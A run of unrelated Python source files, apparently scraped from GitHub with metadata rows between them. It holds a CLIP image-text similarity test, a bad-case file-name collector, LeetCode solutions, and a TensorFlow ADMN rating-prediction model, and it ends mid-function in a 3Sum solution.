# Preprocess the query image (local Flickr30k test image).
image = transform(Image.open("/mnt/c/users/dwc20/pictures/dataset/search/flickr30k/test_img/36979.jpg")).unsqueeze(0).to(device)
texts = []
text_features = []
normalized_text_features = []
# Tokenize candidate captions (five relevant, one deliberately unrelated).
texts.append(clip.tokenize(["A group of friends playing cards and trying to bluff each other into making a terrible mistake ."]).to(device))
texts.append(clip.tokenize(["A group of college students gathers to play texas hold em poker ."]).to(device))
texts.append(clip.tokenize(["Several men play cards while around a green table ."]).to(device))
texts.append(clip.tokenize(["A group of several men playing poker ."]).to(device))
texts.append(clip.tokenize(["Six white males playing poker ."]).to(device))
texts.append(clip.tokenize(["a lion is eating a rabbit."]).to(device))
# Encode image and texts without building autograd graphs.
with torch.no_grad():
    image_feature = model.encode_image(image)
    for text in texts:
        text_features.append(model.encode_text(text))
# Compute image-text similarity.
# First, L2-normalize the features.
image_feature = image_feature / image_feature.norm(dim=-1, keepdim=True)
for text_feature in text_features:
    normalized_text_feature = text_feature / text_feature.norm(dim=-1, keepdim=True)
    normalized_text_features.append(normalized_text_feature)
# Then the cosine similarity is just the dot product of unit vectors.
for text_feature in normalized_text_features:
    similarity = image_feature @ text_feature.T
print(similarity) | mmllllyyy/multi_model_search | clip_test.py | clip_test.py | py | 1,667 | python | en | code | 0 | github-code | 90 |
32409030976 | import os
badcase_txt = r'E:\Data\landmarks\HFB\test\badcase.txt'
json_path = r'E:\Data\landmarks\HFB\HFB\annotations\person_keypoints_val2017.json'
save_path = r'E:\Data\landmarks\HFB\test\crop_badcase.json'
def main():
    """Collect the image file names listed in the bad-case text file.

    NOTE(review): the collected names (and the module-level json_path /
    save_path constants) are currently unused -- the script looks unfinished.
    """
    image_name_list = []
    with open(badcase_txt, 'r') as f_txt:
        lines = f_txt.readlines()
    for line in lines:
        # Keep only the file name: strip the directory and the trailing newline.
        image_name_list.append(os.path.split(line)[1].split('\n')[0])
if __name__ == '__main__':
main() | Daming-TF/HandData | scripts/Data_Interface/halpe_full_body/draw_out_badcase_json.py | draw_out_badcase_json.py | py | 565 | python | en | code | 1 | github-code | 90 |
class Solution:
    def maximumBags(self, capacity: list[int], rocks: list[int], additionalRocks: int) -> int:
        """Return the maximum number of bags that can be filled to capacity.

        Greedy: compute each bag's remaining space and fill the emptiest
        (smallest-gap) bags first until the extra rocks run out.
        (Fixes: last line of the original was corrupted by stray dataset
        metadata; the caller's ``capacity`` list is no longer mutated; the
        undefined ``List`` annotation is replaced with the builtin generic.)
        """
        # Remaining space per bag, smallest first.
        gaps = sorted(c - r for c, r in zip(capacity, rocks))
        filled = 0
        for gap in gaps:
            if additionalRocks < gap:
                break
            additionalRocks -= gap
            filled += 1
        return filled
40730330779 | import tensorflow as tf
import pickle
import time
import os
from tensorflow.python.keras.layers import Dense, Embedding, Conv2D, Dropout, Masking
from tensorflow.python.keras.regularizers import l1, l2
import numpy as np
#原版
class ADMN():
def __init__(self,args):
tf.set_random_seed(0)
np.random.seed(2019)
#模型基本参数
self.review_max_word = args["review_max_word"]
self.review_max_num = args["review_max_num"] #评论窗口
self.vocabulary_num = args["vocabulary_num"]
self.user_num = args["user_num"]
self.item_num = args["item_num"]
self.regularizers = args["regularizers"]
self.rating_weight = args["rating_weight"] #计算评分的方法
#用户id向量,文本,商品编码维度 ,一般用户和商品维度要一致
self.word_embedding_dimension = args["word_embedding_dimension"]
self.user_embedding_dimension = args["user_embedding_dimension"]
self.item_embedding_dimension = args["item_embedding_dimension"]
#cnn卷积层参数
self.cnn_filters = args["cnn_filters"]
self.cnn_padding = args["cnn_padding"]
self.cnn_activation = args["cnn_activation"]
self.cnn_kernel_regularizer = args["cnn_kernel_regularizer"]
self.cnn_kernel_size = args["cnn_kernel_size"]
self.cnn_strides = args["cnn_strides"]
self.dropout_size = args["dropout_size"]
#fm层参数
self.fm_size = args["fm_size"]
self.fm_K = args["fm_K"]
#训练参数
self.learning_rate = args["learning_rate"]
self.beta1 = args["beta1"]
self.beta2 = args["beta2"]
self.epsilon = args["epsilon"]
#self.word_embedding_path = os.path.join(args["root_path"],args["input_data_type"],"word_emb.pkl")
self.batch_size = args["batch_size"]
self.train_time = args["train_time"]
self.sess = args["sess"]
self.is_sample = args["is_sample"]
self.sample_ratio = args["sample_ratio"]
with tf.name_scope("creat_placeholder"):
# shape(none)对应batch大小
self.user_id = tf.placeholder(dtype="int32", shape=(None, 1), name="user_id") # user_id
self.item_id = tf.placeholder(dtype="int32", shape=(None, 1), name="item_id") # item_id
self.user_review = tf.placeholder(tf.float32, [None, self.review_max_num , self.review_max_word],
name="user_review") # user_review 用户评论
self.item_review = tf.placeholder(tf.float32, [None, self.review_max_num , self.review_max_word], name="item_review") # 商品评论
self.user_commented_items_id = tf.placeholder(dtype="int32", shape=(None, self.review_max_num),
name="user_commented_items_id") # 用户评论过的商品的id
self.user_commented_items_rate = tf.placeholder(dtype="float32", shape=(None,self.review_max_num),name="user_commented_items_rate") # 跟上面user_rid对应评论-评分
self.item_commented_users_id = tf.placeholder(dtype="int32", shape=(None, self.review_max_num), name="item_commented_users_id") # 商品评论的人的id
self.item_commented_users_rate = tf.placeholder(dtype="float32", shape=(None, self.review_max_num),name="item_commented_users_rate") # 商品的评论的人的给的分数
self.input_y = tf.placeholder(tf.float32,[None, 1], name="input_y")#评分 # item商品评论
with tf.name_scope("build_review_embedding"):
self.user_review_flat = tf.reshape(self.user_review,[-1,self.review_max_num*self.review_max_word])
print("user_review_flat:{}".format(self.user_review_flat.shape))
self.item_review_flat = tf.reshape(self.item_review,[-1,self.review_max_num*self.review_max_word])
print("item_review_flat:{}".format(self.item_review_flat.shape))
self.user_review_mask = Masking(mask_value=0,input_shape=(self.review_max_num,self.review_max_word))(self.user_review_flat)#mask掉0值,忽略0值
self.item_review_mask = Masking(mask_value=0,input_shape=(self.review_max_num,self.review_max_word))(self.item_review_flat)#忽略商品评论的0值
self.review_embedding_layer = Embedding(input_dim=self.vocabulary_num,output_dim=self.word_embedding_dimension,input_length=self.review_max_num*self.review_max_num)
self.user_review_embedding = self.review_embedding_layer(self.user_review_mask)
self.user_review_embedding = tf.reshape(self.user_review_embedding,shape=[-1, self.review_max_num, self.review_max_word, self.word_embedding_dimension])
print("user_review_embedding:{}".format(self.user_review_embedding.shape))
self.item_review_embedding = self.review_embedding_layer(self.item_review_mask)
self.item_review_embedding = tf.reshape(self.item_review_embedding,shape=[-1, self.review_max_num, self.review_max_word, self.word_embedding_dimension])
print("item_review_embedding:{}".format(self.item_review_embedding.shape))
self.user_review_embedding_sentence = tf.reduce_sum(self.user_review_embedding,axis=2)
print("user_review_embedding_sentence:{}".format(self.user_review_embedding_sentence.shape))
self.item_review_embedding_sentence = tf.reduce_sum(self.item_review_embedding,axis=2)
print("item_review_embedding_sentence:{}".format(self.item_review_embedding_sentence.shape))
#用户商品id向量编码
with tf.name_scope("build_user_item_id_embedding"):
self.user_embedding_layer = Embedding(input_dim=self.user_num,output_dim=self.user_embedding_dimension)
self.user_id_embedding = self.user_embedding_layer(self.user_id)
self.item_embedding_layer = Embedding(input_dim=self.item_num,output_dim=self.item_embedding_dimension)
self.item_id_embedding = self.item_embedding_layer(self.item_id)
self.user_commented_items_id_mask = Masking(mask_value=0)(self.user_commented_items_id)
self.item_commented_users_id_mask = Masking(mask_value=0)(self.item_commented_users_id)
self.user_commented_items_id_mask_embedding = self.item_embedding_layer(self.user_commented_items_id_mask)
self.item_commented_users_id_mask_embedding = self.user_embedding_layer(self.item_commented_users_id_mask)
print("user_commented_items_id_mask_embedding:{}".format(self.user_commented_items_id_mask_embedding.shape))
print("item_commented_users_id_mask_embedding:{}".format(self.item_commented_users_id_mask_embedding.shape))
with tf.name_scope("build_user_item_extra_embedding"):
if (self.rating_weight == "base"): # 1
self.user_commented_items_rate_sum = tf.reduce_sum(self.user_commented_items_rate, axis=1, keepdims=True)
self.user_commented_items_rate_base = self.user_commented_items_rate / self.user_commented_items_rate_sum
self.user_commented_items_rate_base_weight = tf.reshape(self.user_commented_items_rate_base,
shape=(-1, self.review_max_num, 1))
self.user_commented_items_weight = self.user_commented_items_rate_base_weight
self.item_commented_users_rate_sum = tf.reduce_sum(self.item_commented_users_rate, axis=1, keepdims=True)
self.item_commented_users_rate_base = self.item_commented_users_rate / self.item_commented_users_rate_sum
self.item_commented_users_rate_base_weight = tf.reshape(self.item_commented_users_rate_base,
shape=(-1, self.review_max_num, 1))
self.item_commented_users_weight = self.item_commented_users_rate_base_weight
if(self.rating_weight=="softmax"): #2
self.user_commented_items_rate_softmax = tf.reshape(tf.nn.softmax(self.user_commented_items_rate,axis=1,name="user_commented_item_rate_softmax"),shape=(-1,self.review_max_num,1))
self.user_commented_items_weight = self.user_commented_items_rate_softmax
print("user_commented_items_rate_softmax:{}".format(self.user_commented_items_rate_softmax.shape))
self.item_commented_users_rate_softmax = tf.reshape(tf.nn.softmax(self.item_commented_users_rate,axis=1,name="item_commented_item_rate_softmax"),shape=(-1,self.review_max_num,1))
print("item_commented_users_rate_softmax:{}".format(self.item_commented_users_rate_softmax.shape))
self.item_commented_users_weight = self.item_commented_users_rate_softmax
if(self.rating_weight == "unbias_softmax"): #3
self.user_commented_items_rate_mean = tf.reduce_mean(self.user_commented_items_rate,axis=1,keepdims=True)
self.user_commented_items_rate_unbias = self.user_commented_items_rate - self.user_commented_items_rate_mean
self.user_commented_items_rate_unbias_softmax = tf.reshape(tf.nn.softmax(self.user_commented_items_rate_unbias,axis=1,name="user_commented_items_rate_unbias_softmax"),shape=(-1,self.review_max_num,1))
self.user_commented_items_weight = self.user_commented_items_rate_unbias_softmax
self.item_commented_users_rate_mean = tf.reduce_mean(self.item_commented_users_rate,axis=1,keepdims=True)
self.item_commented_users_rate_unbias = self.item_commented_users_rate - self.item_commented_users_rate_mean
self.item_commented_users_rate_unbias_softmax = tf.reshape(tf.nn.softmax(self.item_commented_users_rate_unbias,axis=1,name="item_commented_user_rate_unbias_softmax"),shape=(-1,self.review_max_num,1))
self.item_commented_users_weight = self.item_commented_users_rate_unbias_softmax
if (self.rating_weight == "abs_unbias"): # 4
self.user_commented_items_rate_mean = tf.reduce_mean(self.user_commented_items_rate, axis=1,
keepdims=True)
self.user_commented_items_rate_abs_unbias = tf.abs(
self.user_commented_items_rate - self.user_commented_items_rate_mean)
self.user_commented_items_rate_abs_unbias_sum = tf.reduce_sum(self.user_commented_items_rate, axis=1,
keepdims=True)
self.user_commented_items_rate_abs_unbias_weight = self.user_commented_items_rate / self.user_commented_items_rate_abs_unbias_sum
self.user_commented_items_weight = tf.reshape(self.user_commented_items_rate_abs_unbias_weight,
shape=(-1, self.review_max_num, 1))
self.item_commented_users_rate_mean = tf.reduce_mean(self.item_commented_users_rate, axis=1,
keepdims=True)
self.item_commented_users_rate_abs_unbias = tf.abs(
self.item_commented_users_rate - self.item_commented_users_rate_mean)
self.item_commented_users_rate_abs_unbias_sum = tf.reduce_sum(self.item_commented_users_rate_abs_unbias,
axis=1, keepdims=True)
self.item_commented_users_rate_abs_unbias_weight = self.item_commented_users_rate / self.item_commented_users_rate_abs_unbias_sum
self.item_commented_users_weight = tf.reshape(self.item_commented_users_rate_abs_unbias_weight,
shape=(-1, self.review_max_num, 1))
if(self.rating_weight == "abs_unbias_softmax"): #5
self.user_commented_items_rate_mean = tf.reduce_mean(self.user_commented_items_rate, axis=1, keepdims=True)
self.user_commented_items_rate_abs_unbias = tf.abs(self.user_commented_items_rate - self.user_commented_items_rate_mean)
self.user_commented_items_rate_abs_unbias_softmax = tf.reshape(
tf.nn.softmax(self.user_commented_items_rate_abs_unbias, axis=1,
name="user_commented_items_rate_abs_unbias_softmax"), shape=(-1, self.review_max_num, 1))
self.user_commented_items_weight = self.user_commented_items_rate_abs_unbias_softmax
self.item_commented_users_rate_mean = tf.reduce_mean(self.item_commented_users_rate, axis=1, keepdims=True)
self.item_commented_users_rate_abs_unbias = tf.abs(self.item_commented_users_rate - self.item_commented_users_rate_mean)
self.item_commented_users_rate_abs_unbias_softmax = tf.reshape(
tf.nn.softmax(self.item_commented_users_rate_abs_unbias, axis=1,
name="item_commented_user_rate_abs_unbias_softmax"), shape=(-1, self.review_max_num, 1))
self.item_commented_users_weight = self.item_commented_users_rate_abs_unbias_softmax
if(self.rating_weight == "no_rating"): #6
self.user_review_to_itemId = tf.reshape(tf.multiply(self.user_commented_items_id_mask_embedding,self.item_id_embedding),shape=(-1,self.user_embedding_dimension))
self.user_review_to_itemId_dense = Dense(1,activation="relu")(self.user_review_to_itemId)
self.user_review_to_itemId_dense = tf.reshape(self.user_review_to_itemId_dense,shape=(-1,self.review_max_num,1))
print("user_review_to_itemId_dense:{}".format(self.user_review_to_itemId_dense.shape))
self.user_review_to_itemId_dense_softmax =tf.nn.softmax(self.user_review_to_itemId_dense, axis=1,name="user_review_to_itemId_dense_softmax")
print("user_review_to_itemId_dense_softmax:{}".format(self.user_review_to_itemId_dense_softmax.shape))
self.user_review_to_itemId_dense_softmax = tf.reshape( self.user_review_to_itemId_dense_softmax,shape=[-1,self.review_max_num,1])
self.user_commented_items_weight = self.user_review_to_itemId_dense_softmax
self.item_review_to_userId = tf.reshape(tf.multiply(self.item_commented_users_id_mask_embedding,self.user_id_embedding),shape=(-1,self.user_embedding_dimension))
self.item_review_to_userId_dense = Dense(1,activation="relu")(self.item_review_to_userId)
self.item_review_to_userId_dense = tf.reshape(self.item_review_to_userId_dense,shape=(-1,self.review_max_num,1))
self.item_review_to_userId_dense_softmax = tf.nn.softmax(self.item_review_to_userId_dense,axis=1,
name="item_review_to_userId_dense_softmax")
self.item_review_to_userId_dense_softmax = tf.reshape(self.item_review_to_userId_dense_softmax,shape=[-1,self.review_max_num,1])
self.item_commented_users_weight = self.item_review_to_userId_dense_softmax
self.user_review_weight = self.user_commented_items_weight * self.user_review_embedding_sentence
self.item_review_weight = self.item_commented_users_weight * self.item_review_embedding_sentence
self.user_review_feature = tf.reduce_sum(tf.multiply(self.user_review_weight,self.item_id_embedding),axis=1,keepdims=True)
self.item_review_feature = tf.reduce_sum(tf.multiply(self.item_review_weight,self.user_id_embedding),axis=1,keepdims=True)
print("user_review_feature:{}".format(self.user_review_feature.shape))
print("item_review_feature:{}".format(self.item_review_feature))
with tf.name_scope("build_item_attention"):
self.item_attention = tf.matmul(self.user_id_embedding,tf.transpose(self.item_review_embedding_sentence,[0,2,1]))
self.item_attention = tf.reshape(tf.nn.softmax(self.item_attention),shape=[-1,self.review_max_num,1])
print("item_attention:{}".format(self.item_attention.shape))
self.item_feature = self.item_attention * self.item_review_embedding_sentence
self.item_feature = tf.reduce_sum(self.item_feature,axis=1,keepdims=True)
with tf.name_scope("build_user_attention"):
self.user_attention = tf.matmul(self.item_id_embedding,tf.transpose(self.user_review_embedding_sentence,[0,2,1]))
self.user_attention = tf.reshape(tf.nn.softmax(self.user_attention),shape=[-1,self.review_max_num,1])
print("user_attention:{}".format(self.user_attention.shape))
self.user_feature = self.user_attention * self.user_review_embedding_sentence
self.user_feature = tf.reduce_sum(self.user_feature,axis=1,keepdims=True)
with tf.name_scope("build_concat_layer"):
self.user_feature_concat = tf.concat([self.user_id_embedding,self.user_feature,self.user_review_feature],axis=2,name="user_concat")
self.item_feature_concat = tf.concat([self.item_id_embedding,self.item_feature,self.item_review_feature],axis=2,name="item_concat")
print("user_feature_concat:{}".format(self.user_feature_concat.shape))
print("item_feature_concat:{}".format(self.item_feature_concat.shape))
self.user_feature_dense = Dense(self.user_embedding_dimension,activation="relu")(self.user_feature_concat)
self.item_feature_dense = Dense(self.item_embedding_dimension,activation="relu")(self.item_feature_concat)
print("user_feature_dense:{}".format(self.user_feature_dense.shape))
print("item_feature_dense:{}".format(self.item_feature_dense.shape))
with tf.name_scope("build_outer_product"):
self.user_item_matrix = tf.matmul(tf.transpose(self.user_feature_dense,perm=[0,2,1]),self.item_feature_dense)
self.user_item_matrix = tf.expand_dims(self.user_item_matrix,-1,name="tran3D")
with tf.name_scope("build_convolution_layer"):
self.first_layer = Conv2D(filters=self.cnn_filters,kernel_size=self.cnn_kernel_size,strides=self.cnn_strides,padding=self.cnn_padding,activation=self.cnn_activation,
kernel_regularizer=self.cnn_kernel_regularizer)(self.user_item_matrix)
self.second_layer = Conv2D(filters=self.cnn_filters,kernel_size=self.cnn_kernel_size,strides=self.cnn_strides,padding=self.cnn_padding,activation=self.cnn_activation,
kernel_regularizer=self.cnn_kernel_regularizer)(self.first_layer)
self.third_layer = Conv2D(filters=self.cnn_filters,kernel_size=self.cnn_kernel_size,strides=self.cnn_strides,padding=self.cnn_padding,activation=self.cnn_activation,
kernel_regularizer=self.cnn_kernel_regularizer)(self.second_layer)
self.fourth_layer = Conv2D(filters=self.cnn_filters,kernel_size=self.cnn_kernel_size,strides=self.cnn_strides,padding=self.cnn_padding,activation=self.cnn_activation,
kernel_regularizer=self.cnn_kernel_regularizer)(self.third_layer)
self.fifth_layer = Conv2D(filters=self.cnn_filters,kernel_size=self.cnn_kernel_size,strides=self.cnn_strides,padding=self.cnn_padding,activation=self.cnn_activation,
kernel_regularizer=self.cnn_kernel_regularizer)(self.fourth_layer)
self.sixth_layer = Conv2D(filters=self.cnn_filters,kernel_size=self.cnn_kernel_size,strides=self.cnn_strides,padding=self.cnn_padding,activation=self.cnn_activation,
kernel_regularizer=self.cnn_kernel_regularizer)(self.fifth_layer)
self.dropout_layer = Dropout(self.dropout_size)(self.sixth_layer)
with tf.name_scope("build_prediction"):
self.final_vector = tf.reshape(self.dropout_layer,shape=[-1,self.cnn_filters])
self.fm_w0 = tf.Variable(tf.zeros([1]))
self.fm_W = tf.Variable(tf.truncated_normal([self.cnn_filters]))
self.fm_V = tf.Variable(tf.random_normal([self.fm_K,self.cnn_filters],stddev=0.01))
self.linear_terms = tf.add(self.fm_w0,
tf.reduce_sum(
tf.multiply(self.fm_W,self.final_vector),axis=1,keepdims=True
))
self.interactions = tf.add(self.fm_w0,tf.reduce_sum(
tf.subtract(
tf.pow(tf.matmul(self.final_vector,tf.transpose(self.fm_V)),2),
tf.matmul(tf.pow(self.final_vector,2),tf.transpose(tf.pow(self.fm_V,2)))),
axis=1,keepdims=True
)
)
self.output = tf.add(self.linear_terms,self.interactions)
print("output:{}".format(self.output.shape))
self.error = tf.subtract(self.output, self.input_y)
with tf.name_scope("train_loss"):
self.loss = tf.sqrt(tf.reduce_mean(tf.square(tf.subtract(self.output, self.input_y))))
with tf.name_scope("test_loss"): #因为测试集没法一次性输入
self.test_loss = tf.square(tf.subtract(self.output,self.input_y))
    def model_init(self):
        """Initialize all TF variables on the model's session (must run
        after the graph is built and before training)."""
        self.init = tf.global_variables_initializer()
        #sess.run(self.word_embedding_matrix.initializer, feed_dict={self.emb_initializer: self.emb})
        self.sess.run(self.init)
    def load_data(self,train_data,test_data,para_file):
        """Load pickled train/test rating triples and the per-user/per-item
        review lookup tables produced by preprocessing.

        NOTE(review): files are opened inline without being closed --
        consider `with open(...)` blocks.
        """
        # train_data is e.g. music.train (pickled list of (uid, iid, rating))
        para_data = pickle.load(open(para_file,"rb"))
        self.test_data = np.array(pickle.load(open(test_data,"rb")))
        self.train_data = np.array(pickle.load(open(train_data,"rb"))) # user-item review triples only
        self.users_review = para_data['user_review']
        self.items_review = para_data['item_review']
        self.user_r_rating = para_data["user_r_rating"]
        self.item_r_rating = para_data["item_r_rating"]
        self.user_r_id = para_data["user_r_id"]
        self.item_r_id = para_data["item_r_id"]
    def search_train_data(self,uid, iid, user_r_id, item_r_id, user_r_rating, item_r_rating):
        """Gather, for a batch of user/item ids, the ids and ratings of the
        reviews attached to each user and each item.

        Returns four (batch, review_max_num) float arrays.
        NOTE(review): each element of uid/iid appears to be a length-1
        sequence (int(item) is applied) -- confirm against model_train's
        batch construction.
        """
        data_num = len(uid)
        # Pre-allocate (batch, review_max_num) lookup matrices.
        user_r_id_batch = np.zeros(shape=(data_num, self.review_max_num))
        item_r_id_batch = np.zeros(shape=(data_num, self.review_max_num))
        user_r_rating_batch = np.zeros(shape=(data_num, self.review_max_num))
        item_r_rating_batch = np.zeros(shape=(data_num, self.review_max_num))
        # user_r_id = list(user_r_id)
        # print (user_r_id[2])
        for i, item in enumerate(uid):
            user_r_id_batch[i, :] = user_r_id[int(item)]
            # print (user_r_id)
            user_r_rating_batch[i, :] = user_r_rating[int(item)]
        for i, item in enumerate(iid):
            item_r_id_batch[i, :] = item_r_id[int(item)]
            item_r_rating_batch[i, :] = item_r_rating[int(item)]
            # print ()
        return user_r_id_batch, item_r_id_batch, user_r_rating_batch, item_r_rating_batch
    def model_train(self):
        """Train the rating-prediction model.

        Builds the Adam training op over ``self.loss``, (re)initializes the
        graph, then runs ``self.train_time`` epochs of shuffled mini-batches.
        After the last batch of each epoch the held-out data is scored via
        ``model_test``.  When ``self.is_sample`` is on, every step is followed
        by a loss-weighted re-training pass over the hardest examples
        (``random_sample``).
        """
        #self.model_init()
        print("model_train")
        #self.load_test_data()
        self.test_loss_list = []
        #self.global_step = tf.Variable(0, name="global_step", trainable=False)
        # Create the training op before model_init() so the optimizer's slot
        # variables are covered by the variable initializer.
        self.total_optimizer = tf.train.AdamOptimizer(learning_rate =self.learning_rate,beta1=self.beta1,beta2=self.beta2,epsilon=self.epsilon).minimize(self.loss)
        self.train_data_size = len(self.train_data)
        self.model_init()
        print("data_size_train:{}".format(self.train_data_size))
        # Number of mini-batches per epoch (the last one may be short).
        self.ll = int(self.train_data_size / self.batch_size) + 1
        print("train_time:{}".format(self.ll))
        for epoch in range(self.train_time):
            print("epoch_i:{}".format(epoch))
            train_rmse = []
            # Reshuffle the training examples every epoch.
            self.shuffle_index = np.random.permutation(np.arange(self.train_data_size))
            self.shuffle_data = self.train_data[self.shuffle_index]
            #print("shuffle_data:",self.shuffle_data.shape)
            for batch_num in range(self.ll):
                start_index = batch_num * self.batch_size
                # NOTE(review): capping at train_data_size-1 permanently drops
                # the last example, and an exactly-empty final batch would make
                # zip(*data_train) raise -- confirm whether the -1 is intended.
                end_index = min((batch_num+1)*self.batch_size,self.train_data_size-1)
                #print("end_index:",end_index)
                data_train = self.shuffle_data[start_index:end_index]
                batch_user_id,batch_item_id,batch_y = list(zip(*data_train))
                # Look up the pre-computed review documents for each user/item.
                batch_user_review = []
                batch_item_review = []
                for i in range(len(data_train)):
                    batch_user_review.append(self.users_review[batch_user_id[i][0]])
                    batch_item_review.append(self.items_review[batch_item_id[i][0]])
                batch_user_review = np.array(batch_user_review)
                batch_item_review = np.array(batch_item_review)
                # Dense (batch, review_max_num) id/rating matrices for the
                # reviews written by each user / received by each item.
                batch_user_r_id,batch_item_r_id,batch_user_r_rate,batch_item_r_rate =self.search_train_data(batch_user_id,
                                                                                                            batch_item_id,
                                                                                                            self.user_r_id,
                                                                                                            self.item_r_id,
                                                                                                            self.user_r_rating,
                                                                                                            self.item_r_rating)
                feed_dict = {
                    self.user_id: batch_user_id,
                    self.item_id: batch_item_id,
                    self.input_y: batch_y,
                    self.user_review: batch_user_review,
                    self.item_review: batch_item_review,
                    self.user_commented_items_id: batch_user_r_id,
                    self.user_commented_items_rate: batch_user_r_rate,
                    self.item_commented_users_id: batch_item_r_id,
                    self.item_commented_users_rate: batch_item_r_rate
                }
                # One optimization step; also fetch the loss and the
                # per-example errors (used for importance sampling below).
                _,t_rmse,error = self.sess.run([self.total_optimizer,self.loss,self.error],feed_dict)
                if self.is_sample==True:
                    self.random_sample(batch_user_id,batch_item_id,batch_y,batch_user_r_id,batch_item_r_id,batch_user_r_rate,batch_item_r_rate,error)
                #current_step = tf.train.global_step(self.sess, self.global_step)
                train_rmse.append(t_rmse)
                print("t_rmse:{}".format(t_rmse))
                if batch_num ==(self.ll-1): # last batch of the epoch: evaluate
                    print("\nEvaluation:")
                    print(batch_num)
                    self.model_test()
def show_test_result(self):
print((" test_loss_list:{}".format(self.test_loss_list)))
self.besr_test_mse = min(self.test_loss_list)
print("best test_mse:{}".format(self.besr_test_mse ))
print('end')
    def model_test(self):
        """Score the test set and append the mean squared error to
        ``self.test_loss_list``.

        Iterates the test data in mini-batches, feeding the same review-id /
        review-rating tensors as training, and accumulates the per-batch
        ``self.test_loss`` fetches into one scalar MSE.
        """
        self.test_data_size = len(self.test_data)
        self.ll_test = int(self.test_data_size / self.batch_size) + 1
        test_cost = []
        for batch_num in range(self.ll_test):
            start_index = batch_num * self.batch_size
            # NOTE(review): like model_train, the -1 cap silently drops the
            # final test example -- confirm it is intended.
            end_index = min((batch_num+1)*self.batch_size,self.test_data_size-1)
            data_test = self.test_data[start_index:end_index]
            user_id_test,item_id_test,y_test = list(zip(*data_test))
            # Pre-computed review documents for the users/items in this batch.
            user_valid = []
            item_valid = []
            for i in range(len(data_test)):
                user_valid.append(self.users_review[user_id_test[i][0]])
                item_valid.append(self.items_review[item_id_test[i][0]])
            user_valid = np.array(user_valid)
            item_valid = np.array(item_valid)
            user_r_id_batch, item_r_id_batch, user_r_rate_batch, item_r_rate_batch = self.search_train_data(
                user_id_test, item_id_test, self.user_r_id, self.item_r_id, self.user_r_rating, self.item_r_rating)
            feed_dict = {
                self.user_id: user_id_test,
                self.item_id: item_id_test,
                self.input_y: y_test,
                self.user_review: user_valid,
                self.item_review: item_valid,
                self.user_commented_items_id: user_r_id_batch,
                self.user_commented_items_rate: user_r_rate_batch,
                self.item_commented_users_id: item_r_id_batch,
                self.item_commented_users_rate: item_r_rate_batch
            }
            test_loss = self.sess.run([self.test_loss],feed_dict)
            test_cost.append(test_loss)
        total_mse = 0
        # test_cost is a list (batches) of lists (fetches) of values; the
        # triple loop flattens it into a running scalar sum.
        for i in test_cost:
            for j in i:
                for k in j:
                    total_mse += k
        final_mse = total_mse/self.test_data_size
        print("test_final_mse:{}".format(final_mse))
        self.test_loss_list.append(final_mse)
    def random_sample(self,user_id,item_id,y,user_r_id, item_r_id, user_r_rate, item_r_rate,loss):
        """Importance-sampling step: re-train on the hardest batch examples.

        Builds a softmax distribution over the per-example *loss* values,
        samples ``sample_ratio`` of the batch (without replacement) under it,
        and runs one extra optimizer step on just those examples.  Requires
        ``self.total_optimizer`` to exist, i.e. must run after model_train
        has built the training op.
        """
        num = len(user_id)
        # NOTE(review): reseeding on every call makes the sampling sequence
        # repeat -- confirm whether a one-time seed was intended.
        np.random.seed(2019)
        loss =np.array(loss).flatten()
        # Softmax over per-example losses: harder examples get picked more.
        probability = np.exp(loss)/sum(np.exp(loss))
        #print("probability.shape:{}".format(probability.shape))
        #print("probability length:{}".format(len(probability)))
        #print(probability)
        #print("num:{}".format(num))
        sample_ratio = self.sample_ratio
        #print("sample:{}".format(int(num * sample_ratio)))
        index = np.random.choice(num,size=int(num*sample_ratio),replace=False,p = probability)
        # Slice every feed tensor down to the sampled rows.
        s_user_id = np.array(user_id)[index]
        s_item_id = np.array(item_id)[index]
        s_y = np.array(y)[index]
        s_user_r_id = np.array(user_r_id)[index]
        s_item_r_id = np.array(item_r_id)[index]
        s_user_r_rate = np.array(user_r_rate)[index]
        s_item_r_rate = np.array(item_r_rate)[index]
        s_user_review = []
        s_item_review = []
        for i in range(int(num * sample_ratio)):
            s_user_review.append(self.users_review[s_user_id[i][0]])
            s_item_review.append(self.items_review[s_item_id[i][0]])
        feed_dict = {
            self.user_id: s_user_id,
            self.item_id: s_item_id,
            self.input_y: s_y,
            self.user_review: s_user_review,
            self.item_review: s_item_review,
            self.user_commented_items_id: s_user_r_id,
            self.user_commented_items_rate: s_user_r_rate,
            self.item_commented_users_id: s_item_r_id,
            self.item_commented_users_rate: s_item_r_rate
        }
        # Extra gradient step on the sampled (hard) examples.
        _, s_t_rmse = self.sess.run([self.total_optimizer, self.loss], feed_dict)
        print( "s_t_rmse:{}".format(s_t_rmse))
| wiio12/ADMN | Model/ADMN.py | ADMN.py | py | 30,985 | python | en | code | 4 | github-code | 90 |
18541045409 | from itertools import accumulate
from collections import Counter
# Count subarrays with sum 0.  Prepending 0 makes every subarray a[l:r]
# correspond to a pair of equal prefix sums: prefix[l] == prefix[r].
n=int(input())
a=list(map(int,input().split()))
a=[0]+a
A=list(accumulate(a))
B=Counter(A)
ans=0
for i in B:
    # C(c, 2) pairs per repeated prefix-sum value.  Floor division keeps the
    # arithmetic exact; the original int(c*(c-1)/2) went through a float and
    # can round incorrectly once counts get large (> ~2**26).
    ans = ans + B[i] * (B[i] - 1) // 2
print(ans) | Aasthaengg/IBMdataset | Python_codes/p03363/s863473237.py | s863473237.py | py | 217 | python | en | code | 0 | github-code | 90 |
23045412671 | '''
923. 3Sum With Multiplicity
Medium
Given an integer array arr, and an integer target, return the number of tuples i, j, k such that i < j < k and arr[i] + arr[j] + arr[k] == target.
As the answer can be very large, return it modulo 10^9 + 7.
Example 1:
Input: arr = [1,1,2,2,3,3,4,4,5,5], target = 8
Output: 20
Explanation:
Enumerating by the values (arr[i], arr[j], arr[k]):
(1, 2, 5) occurs 8 times;
(1, 3, 4) occurs 8 times;
(2, 2, 4) occurs 2 times;
(2, 3, 3) occurs 2 times.
https://leetcode.com/problems/3sum-with-multiplicity/
'''
class Solution:
    """LeetCode 923: 3Sum With Multiplicity."""

    def threeSumMulti(self, arr, target):
        """Count index triples i < j < k with arr[i] + arr[j] + arr[k] == target.

        O(n^2) sweep: before visiting index i, ``pair_sums`` holds every sum
        arr[j] + arr[k] with j < k < i, so the triples ending at i are exactly
        pair_sums[target - arr[i]].  Result is returned modulo 10**9 + 7.

        A plain dict replaces ``collections.defaultdict`` and the un-imported
        ``typing.List`` annotation, so the snippet is self-contained/runnable.
        """
        MOD = 10 ** 9 + 7
        pair_sums = {}
        count = 0
        for i in range(2, len(arr)):
            # Fold in the new pairs (j, i - 1) for every j < i - 1.
            for j in range(i - 1):
                s = arr[j] + arr[i - 1]
